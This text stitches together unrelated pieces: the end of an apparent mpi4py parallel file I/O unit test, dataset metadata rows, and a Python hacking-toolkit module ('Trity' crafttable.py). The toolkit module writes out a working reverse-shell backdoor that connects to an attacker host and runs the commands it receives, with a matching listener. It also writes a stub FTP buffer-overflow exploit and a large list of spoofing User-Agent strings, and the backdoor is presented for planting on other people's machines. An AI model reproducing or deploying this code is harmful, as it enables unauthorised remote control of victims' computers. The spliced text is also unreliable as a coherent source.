fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Read_at_all(count*rank, rbuf.as_mpi_c(count))
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testIReadIWriteAtAll(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
try: # MPI 3.1
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Iwrite_at_all(count*rank, wbuf.as_raw()).Wait()
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Iread_at_all(count*rank, rbuf.as_mpi_c(count)).Wait()
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
except NotImplementedError:
if MPI.Get_version() >= (3, 1): raise
def testReadWriteAtAllBeginEnd(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Write_at_all_begin(count*rank, wbuf.as_raw())
fh.Write_at_all_end(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Read_at_all_begin(count*rank, rbuf.as_mpi_c(count))
fh.Read_at_all_end(rbuf.as_raw())
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testReadWriteAll(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Write_all(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Read_all(rbuf.as_mpi_c(count))
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testIReadIWriteAll(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
try: # MPI 3.1
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Iwrite_all(wbuf.as_raw()).Wait()
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Iread_all(rbuf.as_mpi_c(count)).Wait()
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
except NotImplementedError:
if MPI.Get_version() >= (3, 1): raise
def testReadWriteAllBeginEnd(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(42, typecode, count)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Write_all_begin(wbuf.as_raw())
fh.Write_all_end(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek(count*rank, MPI.SEEK_SET)
fh.Read_all_begin(rbuf.as_mpi_c(count))
fh.Read_all_end(rbuf.as_raw())
for value in rbuf[:-1]:
self.assertEqual(value, 42)
self.assertEqual(rbuf[-1], -1)
def testReadWriteOrdered(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(rank%42, typecode, count)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Write_ordered(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Read_ordered(rbuf.as_mpi_c(count))
for value in rbuf[:-1]:
self.assertEqual(value, rank%42)
self.assertEqual(rbuf[-1], -1)
def testReadWriteOrderedBeginEnd(self):
comm = self.COMM
size = comm.Get_size()
rank = comm.Get_rank()
fh = self.FILE
for array in arrayimpl.ArrayTypes:
for typecode in arrayimpl.TypeMap:
etype = arrayimpl.TypeMap[typecode]
fh.Set_size(0)
fh.Set_view(0, etype)
count = 13
wbuf = array(rank%42, typecode, count)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Write_ordered_begin(wbuf.as_raw())
fh.Write_ordered_end(wbuf.as_raw())
fh.Sync()
comm.Barrier()
fh.Sync()
rbuf = array(-1, typecode, count+1)
fh.Seek_shared(0, MPI.SEEK_SET)
fh.Read_ordered_begin(rbuf.as_mpi_c(count))
fh.Read_ordered_end(rbuf.as_raw())
for value in rbuf[:-1]:
self.assertEqual(value, rank%42)
self.assertEqual(rbuf[-1], -1)
class TestIOSelf(BaseTestIO, unittest.TestCase):
COMM = MPI.COMM_SELF
prefix = BaseTestIO.prefix + ('%d-' % MPI.COMM_WORLD.Get_rank())
class TestIOWorld(BaseTestIO, unittest.TestCase):
COMM = MPI.COMM_WORLD
import sys
name, version = MPI.get_vendor()
if name == 'Open MPI':
if version < (2,1,0):
TestIOWorld = None
if version < (1,8,0):
TestIOWorld = None
if sys.platform.startswith('win'):
TestIOSelf = None
TestIOWorld = None
if name == 'MPICH2':
TestIOWorld = None
if name == 'Microsoft MPI':
TestIOWorld = None
if name == 'MPICH1':
TestIOSelf = None
TestIOWorld = None
if name == 'LAM/MPI':
TestIOSelf = None
TestIOWorld = None
try:
dummy = BaseTestIO()
dummy.COMM = MPI.COMM_SELF
dummy.setUp()
dummy.tearDown()
del dummy
except NotImplementedError:
TestIOSelf = None
TestIOWorld = None
if __name__ == '__main__':
unittest.main()
| 35.87822 | 76 | 0.487598 | 1,720 | 15,320 | 4.222093 | 0.072093 | 0.03415 | 0.024787 | 0.029744 | 0.833792 | 0.823327 | 0.783393 | 0.778436 | 0.771275 | 0.769623 | 0 | 0.024401 | 0.408812 | 15,320 | 426 | 77 | 35.962441 | 0.77741 | 0.002676 | 0 | 0.760705 | 0 | 0 | 0.003994 | 0 | 0 | 0 | 0 | 0 | 0.075567 | 1 | 0.040302 | false | 0 | 0.012594 | 0 | 0.075567 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
96425ffa7024eeed6b014af54776a01f9608fadb | 100,231 | py | Python | Tools/Trity-1/trity/crafttable.py | Anaswae/ITWSV | a8c3944aa0b44b6c4b520afef15f4a1a2ebe98ce | [
"MIT"
] | 39 | 2019-10-25T07:05:36.000Z | 2022-03-31T23:26:51.000Z | Tools/Trity-1/trity/crafttable.py | Anaswae/ITWSV | a8c3944aa0b44b6c4b520afef15f4a1a2ebe98ce | [
"MIT"
] | 1 | 2021-05-27T16:39:21.000Z | 2021-05-27T16:39:21.000Z | Tools/Trity-1/trity/crafttable.py | Anaswae/ITWSV | a8c3944aa0b44b6c4b520afef15f4a1a2ebe98ce | [
"MIT"
] | 17 | 2019-10-26T08:03:20.000Z | 2022-02-04T04:11:14.000Z | import os, io, platform, sys
from time import sleep
class color:
    """ANSI SGR escape sequences for styling terminal output.

    Attributes are plain string constants; concatenate them around text
    and terminate with ``END`` to restore normal rendering.
    """
    # Text attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    END = '\033[0m'  # reset all attributes back to the terminal default
    # Foreground colours (bright variants except DARKCYAN)
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    DARKCYAN = '\033[36m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
# Short module-level ANSI colour aliases; the menu code below interpolates
# these bare names (G, W, C, ...) directly into its prompt strings.
W, R, G, O, B, P, C, GR, T = (
    '\033[0m',   # white (normal / reset)
    '\033[31m',  # red
    '\033[32m',  # green
    '\033[33m',  # orange
    '\033[34m',  # blue
    '\033[35m',  # purple
    '\033[36m',  # cyan
    '\033[37m',  # gray
    '\033[93m',  # tan
)
def table():
table = raw_input(''+G+'' + color.UNDERLINE + 'Tri>Craft>' + color.END)
if table == "backdoor":
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Generating backdoor...' + color.END)
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'For all your remote access needs!' + color.END)
FILE = open("backdoor.py","w")
#============================================================================#
#=================================BACKDOOR===================================#
#============================================================================#
FILE.write("""
#!/usr/bin/python
import subprocess #Process commands
import socket #Process socket data
import os
import sys
import time
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
#To test this on one computer open 2 terminals and make sure your root.
#In terminal 1 type "nc -lvp 443" without the quotes
#Or use the listener
#In the other terminal open the this python script and there you go!
#[!]You have get this python script onto the victims computer[!]#
#--------------THE REAL CODE---------------#
host = "127.0.0.1" #Attack computers ip <-- Change to whatever your ip is (internal)
port = 443 #Attack port
passwd = "root" #Password so other people cant connect
#Check password
def Login():
global s
s.send(""+T+"Login:"+W+"")
pwd = s.recv(1024)
if pwd.strip() != passwd:
Login()
else:
s.send(""+G+"Connected #>"+W+"")
Shell()
#Execute shell commands
def Shell():
while True:
data = s.recv(1024)
if data.strip() == ":kill":
break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = proc.stdout.read() + proc.stderr.read()
s.send(output)
s.send(""+G+"#>"+W+"")
#Start Script
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print ""
Login()
except:
print ""
""")
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Done generating! Now fire away!' + color.END)
FILE.close()
elif table == "help":
print (''+C+'backdoor'+W+' - generate a backdoor that you can plant on other machines' + color.END)
print (''+C+'listener'+W+' - listen to a specific port for the backdoor and other things' + color.END)
print (''+C+'exploit'+W+' - exploit a vulnerable target with shell code' + color.END)
print (''+C+'useragents'+W+' - generate user-agents' + color.END)
elif table == "listener":
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Generating listener...' + color.END)
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Use this for your backdoor to get the connection!' + color.END)
FILE = open("listener.py","w")
#============================================================================#
#=================================LISTENER===================================#
#============================================================================#
FILE.write("""
#!/usr/bin/python
from socket import *
HOST = '' # '' means bind to all interfaces
PORT = 443 # port you can change this to anything but its gotta be the same as the backdoor
s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind((HOST, PORT))
print "Listening on 0.0.0.0:%s" % str(PORT)
s.listen(10)
conn, addr = s.accept()
print 'Connected by', addr
data = conn.recv(1024)
while 1:
command = raw_input("Enter shell command or quit: ")
conn.send(command)
if command == "quit": break
data = conn.recv(1024)
print data
conn.close()
""")
FILE.close()
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Done generating! Now fire away!' + color.END)
elif table == "exploit":
#============================================================================#
#=================================EXPLOIT====================================#
#============================================================================#
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Generating exploit thingy...' + color.END)
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Use this to exploit vulnerable machines! Change the shell code to whatever you want!' + color.END)
FILE = open("exploit.py","w")
FILE.write("""import sys
import socket
import os
hostname = "idk"
password = "whatever"
username = "A"*1024 #<-- shellcode here
connect = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect.connect((hostname, 21))
except:
print "Failed LOL"
response = connect.recv(2000)
print response
sys.exit(1)
""")
FILE.close()
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Done generating! Now fire away!' + color.END)
elif table == "useragents":
#============================================================================#
#===============================USER-AGENTS==================================#
#============================================================================#
# Write a static list of browser User-Agent strings to User-Agents.txt
# (for request spoofing/rotation).  The triple-quoted literal started on the
# FILE.write line below continues far past this point in the file.
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Generating User Agents...' + color.END)
print (''+G+'[*] ' + color.UNDERLINE + ''+W+'Use this for many different things!' + color.END)
FILE = open("User-Agents.txt","w")
FILE.write("""Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)
Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) chromeframe/10.0.648.205
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
Mozilla/5.0 ( ; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 7.1; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; AskTB5.5)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; FDM; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; Tablet PC 2.0)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 3.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; msn OptimizedIE8;ZHCN)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; Zune 4.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; MS-RTC LM 8; Zune 4.7)
Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre
Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110324 Firefox/4.2a1pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.2a1pre) Gecko/20110323 Firefox/4.2a1pre
Mozilla/5.0 (X11; Linux x86_64; rv:2.0b9pre) Gecko/20110111 Firefox/4.0b9pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b9pre) Gecko/20101228 Firefox/4.0b9pre
Mozilla/5.0 (Windows NT 5.1; rv:2.0b9pre) Gecko/20110105 Firefox/4.0b9pre
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101128 Firefox/4.0b8pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
Mozilla/5.0 (Windows NT 5.1; rv:2.0b8pre) Gecko/20101127 Firefox/4.0b8pre
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8
Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20101111 Firefox/4.0b7
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20100101 Firefox/4.0b7
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre
Mozilla/5.0 (Windows NT 6.1; rv:2.0b6pre) Gecko/20100903 Firefox/4.0b6pre Firefox/4.0b6pre
Mozilla/5.0 (X11; Linux x86_64; rv:2.0b4) Gecko/20100818 Firefox/4.0b4
Mozilla/5.0 (X11; Linux i686; rv:2.0b3pre) Gecko/20100731 Firefox/4.0b3pre
Mozilla/5.0 (Windows NT 5.2; rv:2.0b13pre) Gecko/20110304 Firefox/4.0b13pre
Mozilla/5.0 (Windows NT 5.1; rv:2.0b13pre) Gecko/20110223 Firefox/4.0b13pre
Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20110204 Firefox/4.0b12pre
Mozilla/5.0 (X11; Linux i686; rv:2.0b12pre) Gecko/20100101 Firefox/4.0b12pre
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110131 Firefox/4.0b11pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110129 Firefox/4.0b11pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pre
Mozilla/5.0 (Windows NT 6.1; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b11pre) Gecko/20110126 Firefox/4.0b11pre
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b10pre) Gecko/20110118 Firefox/4.0b10pre
Mozilla/5.0 (Windows NT 6.1; rv:2.0b10pre) Gecko/20110113 Firefox/4.0b10pre
Mozilla/5.0 (X11; Linux i686; rv:2.0b10) Gecko/20100101 Firefox/4.0b10
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:2.0b10) Gecko/20110126 Firefox/4.0b10
Mozilla/5.0 (Windows NT 6.1; rv:2.0b10) Gecko/20110126 Firefox/4.0b10
Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:2.0) Gecko/20110307 Firefox/4.0
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:2.0) Gecko/20110404 Fedora/16-dev Firefox/4.0
Mozilla/5.0 (X11; Arch Linux i686; rv:2.0) Gecko/20110321 Firefox/4.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20110319 Firefox/4.0
Mozilla/5.0 (Windows NT 6.1; rv:1.9) Gecko/20100101 Firefox/4.0
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8
Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8
Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.3a5pre) Gecko/20100526 Firefox/3.7a5pre
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5
Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20091218 Firefox 3.6b5
Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b1) Gecko/20091014 Firefox/3.6b1 GTB5
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090428 Firefox/3.6a1pre
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090405 Firefox/3.6a1pre
Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.2a1pre) Gecko/20090405 Ubuntu/9.04 (jaunty) Firefox/3.6a1pre
Mozilla/5.0 (Windows; Windows NT 5.1; es-ES; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre
Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre
Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9
Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.2.9) Gecko/20100913 Firefox/3.6.9
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 ( .NET CLR 3.5.30729; .NET CLR 4.0.20506)
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9
Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.2.8) Gecko/20101230 Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 SUSE/3.6.8-0.1.1 Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.2.8) Gecko/20100722 Ubuntu/10.04 (lucid) Firefox/3.6.8
